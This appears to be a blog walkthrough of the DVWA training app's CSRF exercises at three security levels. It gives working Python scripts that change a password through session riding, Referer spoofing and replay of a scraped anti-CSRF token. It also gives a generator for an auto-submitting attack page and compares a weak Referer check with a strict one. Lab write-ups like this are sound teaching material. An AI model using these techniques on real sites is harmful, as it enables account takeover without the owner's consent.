DVWA - CSRF (low, medium, high)
2017-01-06 14:12
435 views
low
Setting the PHPSESSID and security cookies is all it takes to make the cross-site request:

```python
import requests


def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
    # The victim's session cookie plus the DVWA security level
    headers = {
        'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=low',
    }
    new_password = 'ac'
    # DVWA's change-password form submits via GET, so the whole request fits in the URL
    url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password)
    res = requests.get(url, headers=headers)
    if 'Password Changed.' in res.text:
        print('Yes')
    else:
        print('No')


if __name__ == '__main__':
    main()
```
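The script above rides the victim's session from the attacker's machine. To deliver the same request from another site through the victim's own browser, which is what the low level is meant to demonstrate, you host a page that auto-submits a form at the DVWA endpoint. The helper below is an added example, not code from the original post; it builds that page from the request parameters shown above (the browser attaches the PHPSESSID cookie itself, so the page needs no cookie), and also emits the same request as a single URL for an `<img src>` tag. Values are HTML-escaped so a parameter containing quotes cannot break out of its attribute.

```python
import html
from urllib.parse import urlencode

# Target and parameters taken from the low-level request on this page.
TARGET = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
PARAMS = {'password_new': 'ac', 'password_conf': 'ac', 'Change': 'Change'}


def build_csrf_poc(action, params, method='GET'):
    """Return an HTML page that auto-submits `params` to `action`.

    The victim's browser adds the DVWA cookies to the request on its own,
    so no PHPSESSID appears anywhere in the attacker's page. Names, values
    and the action URL are HTML-escaped (quotes included) so that a value
    such as a"b cannot terminate the attribute and corrupt the form.
    """
    inputs = '\n'.join(
        '    <input type="hidden" name="%s" value="%s">'
        % (html.escape(k, quote=True), html.escape(str(v), quote=True))
        for k, v in params.items()
    )
    return (
        '<!DOCTYPE html>\n<html><body>\n'
        '<form id="f" action="%s" method="%s">\n%s\n</form>\n'
        '<script>document.getElementById("f").submit();</script>\n'
        '</body></html>\n'
        % (html.escape(action, quote=True), method, inputs)
    )


def build_csrf_get_url(action, params):
    """The same request as one GET URL, usable as the src of an <img> tag.

    Works only because DVWA accepts the password change over GET; a POST-only
    endpoint needs the form variant above.
    """
    return '%s?%s' % (action, urlencode(params))


if __name__ == '__main__':
    print(build_csrf_poc(TARGET, PARAMS))
    print(build_csrf_get_url(TARGET, PARAMS))
```

Save the generated page on any host the victim can reach and open it in a browser that is logged in to DVWA at security=low; the form submits on load and the password is changed without the victim seeing the request.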
medium
Looking at the source, we find:

```php
// Checks to see where the request came from
if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )
```

The request origin is validated against the Referer header. Bypass idea: set a Referer in the HTTP request header ourselves. Note that `eregi()` is a case-insensitive regex search anywhere in the subject, so the check only requires the server name to appear somewhere in the Referer; an attacker page served from a URL that contains `192.168.67.22` in its path or hostname passes it just as well as the value used below.
```python
import requests


def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
    headers = {
        'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=medium',
        # Any value containing the server name satisfies the eregi() check
        'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/'
    }
    new_password = 'ac'
    url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password)
    res = requests.get(url, headers=headers)
    if 'Password Changed.' in res.text:
        print('Yes')
    else:
        print('No')


if __name__ == '__main__':
    main()
```
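To make the weakness of the medium-level check concrete, the following added example (not from the original post) models the `eregi()` substring check in Python and runs it, next to a stricter origin comparison written for this example, over a few constructed Referer values: the legitimate DVWA page, two attacker-controlled URLs that merely contain the lab IP `192.168.67.22`, an unrelated attacker URL, and a request with no Referer at all.

```python
import re
from urllib.parse import urlparse

# What $_SERVER['SERVER_NAME'] holds for the lab host used on this page.
SERVER_NAME = '192.168.67.22'
ALLOWED_ORIGIN = 'http://192.168.67.22'


def dvwa_medium_referer_check(server_name, referer):
    """Model of eregi($_SERVER['SERVER_NAME'], $_SERVER['HTTP_REFERER']).

    eregi() is a case-insensitive regex search anywhere in the subject, so the
    request is accepted as soon as the server name occurs *somewhere* in the
    Referer. The dots of the IP address are regex metacharacters and are left
    unescaped on purpose, exactly as the PHP call leaves them.
    """
    if not referer:
        return False
    return re.search(server_name, referer, re.IGNORECASE) is not None


def strict_origin_check(allowed_origin, referer):
    """Hardened alternative (written for this example, not DVWA code).

    Compares scheme and host:port of the Referer with the allowed origin and
    rejects a missing Referer rather than silently trusting the request.
    """
    if not referer:
        return False
    r, a = urlparse(referer), urlparse(allowed_origin)
    return (r.scheme.lower(), r.netloc.lower()) == (a.scheme.lower(), a.netloc.lower())


# Constructed Referer values: one legitimate, three attacker-controlled, one absent.
REFERERS = [
    'http://192.168.67.22/dvwa/vulnerabilities/csrf/',   # real DVWA page
    'http://attacker.example/192.168.67.22/poc.html',     # server name in the path
    'http://192.168.67.22.attacker.example/poc.html',     # server name as a subdomain
    'http://attacker.example/poc.html',                   # no server name at all
    None,                                                 # Referer header stripped
]


def compare_checks(referers=REFERERS):
    """Return {referer: (accepted_by_medium_check, accepted_by_strict_check)}."""
    return {
        ref: (dvwa_medium_referer_check(SERVER_NAME, ref),
              strict_origin_check(ALLOWED_ORIGIN, ref))
        for ref in referers
    }


if __name__ == '__main__':
    for ref, (medium, strict) in compare_checks().items():
        print('%-50s medium=%-5s strict=%s' % (ref, medium, strict))
```

The two attacker URLs pass the medium-level check and fail the strict one, which is the whole difference between "contains the server name" and "is the same origin". A Referer check is still only a secondary defence: browsers may omit the header under some referrer policies, so a token bound to the session, as in the high level, is the primary control.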
high
Looking at the source, we find an additional check on a dynamic user_token:

```php
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
```

Bypass idea: in code, first send a request to fetch the current user_token, then send a second request that uses it to change the password. This works because our script carries the victim's PHPSESSID and can read the token from the response; a page on another origin loaded in the victim's browser cannot read it, since the same-origin policy blocks access to the response body, so the script below is session riding rather than a browser-delivered CSRF. Turning it into a genuine cross-site attack needs a way to read the token from the DVWA origin, which is why the token check is the real defence here.
```python
import re

import requests


def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
    headers = {
        'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=high',
        'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/'
    }
    # Step 1: fetch the form and pull the session-bound token out of its hidden input
    res = requests.get(url, headers=headers)
    m = re.search(r"user_token' value='(.*?)'", res.text, re.M | re.S)
    if m:
        user_token = m.group(1)
        new_password = 'ac'
        # Step 2: replay the password change with the freshly obtained token
        url = '%s?password_new=%s&password_conf=%s&user_token=%s&Change=Change' % (
            url, new_password, new_password, user_token)
        res = requests.get(url, headers=headers)
        if 'Password Changed.' in res.text:
            print('Yes')
        else:
            print('No')
            print(res.text)


if __name__ == '__main__':
    main()
```
Note: these three exercises are meant to be cross-site. Don't just keep testing in the same local browser; that misses the point.